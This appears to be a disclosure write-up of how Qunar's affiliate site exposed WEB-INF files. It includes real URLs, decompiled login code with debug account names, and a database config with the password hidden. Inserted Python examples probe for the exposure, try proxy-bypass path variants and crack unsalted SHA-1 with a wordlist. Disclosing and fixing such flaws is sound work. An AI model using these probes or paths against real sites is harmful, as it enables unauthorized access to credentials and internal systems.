Once the files under the WEB-INF directory can be read, the structure of the system is basically clear (and at the same time the weakness of a layered architecture shows itself: every layer's configuration and classes are laid out for the reader).
First read the web.xml of the Tomcat container (the site's web tier is basically Nginx + Tomcat) to learn which application framework is used and how it is laid out:
http://affiliate.qunar.com/affiliate/WEB-INF/web.xml
It declares two Struts 1 configuration files:
/WEB-INF/struts-config.xml, /WEB-INF/struts-front-config.xml
One is the configuration of the management (back-office) application; the other is the configuration of the front-end application.
Look only at the management application's configuration, struts-config.xml: from its action mappings we can walk through all the Action class files and pick out the login Action. (Rebuilding this small application would be easy and pleasant: the Actions come from decompilation, the DTOs from the form-bean fields in the configuration plus the decompiled DTO classes, and for the DAO layer, if you don't like Hibernate, you can write JDBC yourself, and the whole project is there! Haha!)
http://affiliate.qunar.com/affiliate/WEB-INF/struts-config.xml
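As an added example (not part of the original report, and not run against the site it describes), here is a small Python probe that checks whether a Java web application behind a reverse proxy serves its WEB-INF artefacts directly, in the order the report reads them: the deployment descriptor, the Struts configuration, the Hibernate configuration and raw class files. It also tries case, encoding and dot-segment variants of the path, because a deny rule on the proxy that only matches the literal string `/WEB-INF/` misses them. The base URL, the pluggable fetch callback and the canned responses are assumptions made so the script runs offline.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# Paths the report reads directly, plus variants that often slip past a naive
# reverse-proxy deny rule (case, percent-encoded slash, dot segment).
WEB_INF_PATHS: List[str] = [
    "/WEB-INF/web.xml",
    "/WEB-INF/struts-config.xml",
    "/WEB-INF/struts-front-config.xml",
    "/WEB-INF/classes/hibernate.cfg.xml",
    "/web-inf/web.xml",        # case variant
    "/WEB-INF%2fweb.xml",      # percent-encoded slash
    "/./WEB-INF/web.xml",      # dot segment
]

# Byte signatures that distinguish a real artefact from a "soft 404" page
# that answers 200 with an HTML error body.
SIGNATURES: Dict[bytes, str] = {
    b"<web-app": "servlet deployment descriptor",
    b"<struts-config": "Struts 1 configuration",
    b"<hibernate-configuration": "Hibernate configuration (may contain DB credentials)",
    b"\xca\xfe\xba\xbe": "Java class file (decompilable)",
}

Fetch = Callable[[str], Tuple[int, bytes]]


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, bytes]:
    """Live fetcher on the standard library; returns (status, first 64 KiB of body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "webinf-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536)
    except urllib.error.HTTPError as e:
        return e.code, e.read(65536)
    except (urllib.error.URLError, OSError):
        return 0, b""


def classify(status: int, body: bytes) -> Optional[str]:
    """Describe the leaked artefact if (status, body) looks like one, else None."""
    if status != 200:
        return None
    head = body[:4096]
    for sig, desc in SIGNATURES.items():
        if sig in head:
            return desc
    return None


def probe(base_url: str, fetch: Fetch = http_fetch,
          paths: List[str] = WEB_INF_PATHS) -> Dict[str, str]:
    """Request each path under base_url; return {path: description} for confirmed hits."""
    hits: Dict[str, str] = {}
    base = base_url.rstrip("/")
    for path in paths:
        status, body = fetch(base + path)
        desc = classify(status, body)
        if desc is not None:
            hits[path] = desc
    return hits


# Constructed offline fixture (an assumption, not captured traffic): a proxy
# that serves the webapp directory verbatim, as the report describes.
_FAKE_SITE: Dict[str, Tuple[int, bytes]] = {
    "/WEB-INF/web.xml": (200, b'<?xml version="1.0"?><web-app><servlet/></web-app>'),
    "/WEB-INF/struts-config.xml": (200, b"<struts-config><form-beans/></struts-config>"),
    "/WEB-INF/classes/hibernate.cfg.xml":
        (200, b"<hibernate-configuration><session-factory/></hibernate-configuration>"),
    "/web-inf/web.xml": (200, b"<html><body>Page not found</body></html>"),  # soft 404
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Offline stand-in for http_fetch, answering from _FAKE_SITE."""
    return _FAKE_SITE.get(urllib.parse.urlsplit(url).path, (404, b""))


if __name__ == "__main__":
    for path, desc in sorted(probe("http://example.test", fake_fetch).items()):
        print(f"EXPOSED {path}: {desc}")
```

A servlet container never serves WEB-INF itself, so a hit here means the reverse proxy is serving the deployed webapp directory as static files; the fix is on the proxy side (stop mapping the webapp root as a static document root, and deny `WEB-INF` and `META-INF` with a case-insensitive match), after which the probe should report no hits for any variant.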
Download the class file and decompile it (www.2cto.com):
http://affiliate.qunar.com/affiliate/WEB-INF/classes/com/qunar/affiliate/actions/LogonAction.class
package com.qunar.affiliate.actions;

import com.qunar.affiliate.controller.UserController;
import com.qunar.affiliate.model.User;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.struts.action.Action;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
import org.apache.struts.action.DynaActionForm;

public class LogonAction extends Action
{
    static final String logon_user = "affiliate_user";

    public ActionForward execute(ActionMapping arg0, ActionForm arg1, HttpServletRequest arg2, HttpServletResponse arg3)
        throws Exception
    {
        DynaActionForm aform = (DynaActionForm) arg1;
        UserController uc = new UserController();
        // The "name" and "password" form fields are checked by UserController.validateUser
        User user = uc.validateUser(aform.getString("name"), aform.getString("password"));
        if (user != null)
        {
            arg2.getSession().setAttribute("affiliate_user", user);
            return arg0.findForward("success");
        }
        return arg0.findForward("failed");
    }
}
Then I found the UserController class file and decompiled it, and got a pleasant surprise:
package com.qunar.affiliate.controller;

import com.qunar.affiliate.model.User;
import com.qunar.affiliate.util.Encrypt;
import com.qunar.affiliate.util.HibernateUtil;
import org.apache.log4j.Logger;
import org.hibernate.Criteria;
import org.hibernate.SessionFactory;
import org.hibernate.Transaction;
import org.hibernate.classic.Session;
import org.hibernate.criterion.Example;

// Cleaned-up decompiler output: the stray "throw localObject;" lines the
// decompiler emitted after each finally block are its rendering of the
// implicit rethrow and are dropped here.
public class UserController
{
    static Logger logger = Logger.getLogger(UserController.class);

    // Debug entry point shipped inside the production class: it carries two
    // real account names together with their plaintext passwords (redacted).
    public static void main(String[] args)
    {
        UserController controller = new UserController();
        if (args[0].equals("store")) {
            controller.createAndStoreUser("jingyi.zhang", "Password Hiding");
        }
        else if (args[0].equals("list"))
        {
            User localUser = controller.validateUser("qiang.zhou", "Password Hiding");
        }
    }

    public User createAndStoreUser(String name, String password)
    {
        Session session = null;
        try {
            session = HibernateUtil.getSessionFactory().openSession();
            session.beginTransaction();
            User user = new User();
            user.setName(name);
            // The password is stored as an unsalted "SHA" digest
            user.setHashed_password(Encrypt.change("SHA", password));
            session.save(user);
            session.getTransaction().commit();
            return user;
        }
        finally {
            if (session != null) try { session.close(); } catch (Throwable t) { logger.error("UserController close session failed!", t); }
        }
    }

    public User validateUser(String name, String password) {
        Session session = null;
        try {
            session = HibernateUtil.getSessionFactory().openSession();
            session.beginTransaction();
            User user = new User();
            user.setName(name);
            user.setHashed_password(Encrypt.change("SHA", password));
            // Query by example: a row must match both name and hashed_password
            User vu = (User) session.createCriteria(User.class).add(Example.create(user)).uniqueResult();
            session.getTransaction().commit();
            return vu;
        }
        finally {
            if (session != null) try { session.close(); } catch (Throwable t) { logger.error("UserController close session failed!", t); }
        }
    }
}
The two administrator accounts used for debugging are still in the class's main() method and were never removed!
Go to the login page of the Qunar affiliate promotion management console; just looking at it is enough to see the danger:
http://affiliate.qunar.com/affiliate/logon.jsp
(Anything you could do in here would be money in the bank! Just joking!)
Let's continue!
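The decompiled UserController above stores and checks passwords as an unsalted "SHA" digest and looks the row up by exact match on name and hashed_password. The following added example (not part of the original report or of Qunar's code) reproduces that check in Python beside a hardened version, to show what the unsalted digest gives away: two users with the same password get the same stored value, and one pass over a wordlist cracks every account at once, which is how a weak password such as the "Test" account mentioned further down falls. It assumes that Encrypt.change("SHA", pw) is the hex digest of Java's MessageDigest "SHA" (SHA-1) over the UTF-8 password; the user table and wordlist are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple


def weak_hash(password: str) -> str:
    """Assumed behaviour of Encrypt.change("SHA", pw): unsalted SHA-1 hex digest."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


# Constructed stand-in for the user table (name -> hashed_password); the
# account names are the ones in the decompiled main(), the passwords invented.
WEAK_USERS: Dict[str, str] = {
    "jingyi.zhang": weak_hash("Password1"),
    "qiang.zhou": weak_hash("Password1"),
    "tester": weak_hash("Test"),
}


def weak_validate(users: Dict[str, str], name: str, password: str) -> Optional[str]:
    """Mirror of validateUser(): hash the input, then require a row whose name
    and hashed_password both match (what Hibernate's query-by-example does)."""
    candidate = weak_hash(password)
    stored = users.get(name)
    if stored is not None and stored == candidate:
        return name
    return None


def crack_with_wordlist(users: Dict[str, str], wordlist) -> Dict[str, str]:
    """Offline attack the unsalted scheme permits: hash each candidate once and
    match it against every stored digest at the same time."""
    table = {weak_hash(w): w for w in wordlist}
    return {name: table[h] for name, h in users.items() if h in table}


# Hardened form: per-user random salt, PBKDF2-HMAC-SHA256, constant-time compare.
PBKDF2_ROUNDS = 200_000


def strong_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh 16-byte salt is drawn when none is given."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


STRONG_USERS: Dict[str, Tuple[bytes, bytes]] = {
    "jingyi.zhang": strong_hash("Password1"),
    "qiang.zhou": strong_hash("Password1"),
}


def strong_validate(users: Dict[str, Tuple[bytes, bytes]], name: str, password: str) -> Optional[str]:
    rec = users.get(name)
    if rec is None:
        # Spend the same work for an unknown user so the lookup is not a timing oracle
        strong_hash(password, b"\x00" * 16)
        return None
    salt, stored = rec
    _, candidate = strong_hash(password, salt)
    return name if hmac.compare_digest(stored, candidate) else None


if __name__ == "__main__":
    print("same password, same digest:", WEAK_USERS["jingyi.zhang"] == WEAK_USERS["qiang.zhou"])
    print("cracked:", crack_with_wordlist(WEAK_USERS, ["123456", "Test", "Password1"]))
    print("same password, salted:", STRONG_USERS["jingyi.zhang"][1] == STRONG_USERS["qiang.zhou"][1])
```

With the hardened scheme the query-by-example lookup no longer works as written, since the stored value depends on the salt: the application has to fetch the row by name, then recompute and compare the digest, which is what strong_validate does.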
I also noticed this line of code, which shows that the data layer uses the Hibernate framework:
session = HibernateUtil.getSessionFactory().openSession();
That means the database configuration is exposed as well; following the usual location of the Hibernate configuration file, it was found at:
http://affiliate.qunar.com/affiliate/WEB-INF/classes/hibernate.cfg.xml
<hibernate-configuration>
  <session-factory>
    <!-- Database connection settings -->
    <property name="connection.driver_class">com.mysql.jdbc.Driver</property>
    <property name="connection.url">jdbc:mysql://l-aff2.Hide.Hide.qunar.com/affiliate?characterEncoding=UTF-8</property>
    <property name="connection.username">affiliate_new</property>
    <property name="connection.password">password Hiding</property>
    <!-- JDBC connection pool (use the built-in) -->
    <!-- <property name="connection.pool_size">10</property> -->
    <!-- Hibernate c3p0 -->
    <property name="hibernate.connection.provider_class">org.hibernate.connection.C3P0ConnectionProvider</property>
    <property name="hibernate.c3p0.max_size">10</property>
    <property name="hibernate.c3p0.min_size">2</property>
    <property name="hibernate.c3p0.timeout">1800</property>
    <property name="hibernate.c3p0.max_statements">100</property>
    <property name="hibernate.c3p0.idle_test_period">3000</property>
    <property name="hibernate.c3p0.acquire_increment">2</property>
    <!-- SQL dialect -->
    <property name="dialect">org.hibernate.dialect.MySQLDialect</property>
    <!-- Enable Hibernate's automatic session context management -->
    <property name="current_session_context_class">thread</property>
    <!-- Disable the second-level cache -->
    <property name="cache.provider_class">org.hibernate.cache.NoCacheProvider</property>
    <!-- Echo all executed SQL to stdout -->
    <property name="show_sql">true</property>
    <!-- Drop and re-create the database schema on startup -->
    <!-- <property name="hbm2ddl.auto">create</property> -->
    <mapping resource="com/qunar/affiliate/model/user.hbm.xml"/>
  </session-factory>
</hibernate-configuration>
However, the database host name points to the intranet, which disappointed me:
I have no trick for that and don't know how to push further into a J2EE system from here!
In addition, there are a few minor issues:
1. Page access permission control problems:
http://u.qunar.com/left.jsp
http://u.qunar.com/direct/regUnion.jsp
2. Weak password of another test webmaster account:
Test
3. XSS
Solution:
The security problems found at the application layer are serious (the overall security architecture is relatively acceptable). Developers and operations staff should acquire basic security awareness!
(What gift do you have for me this time?)
Author: shine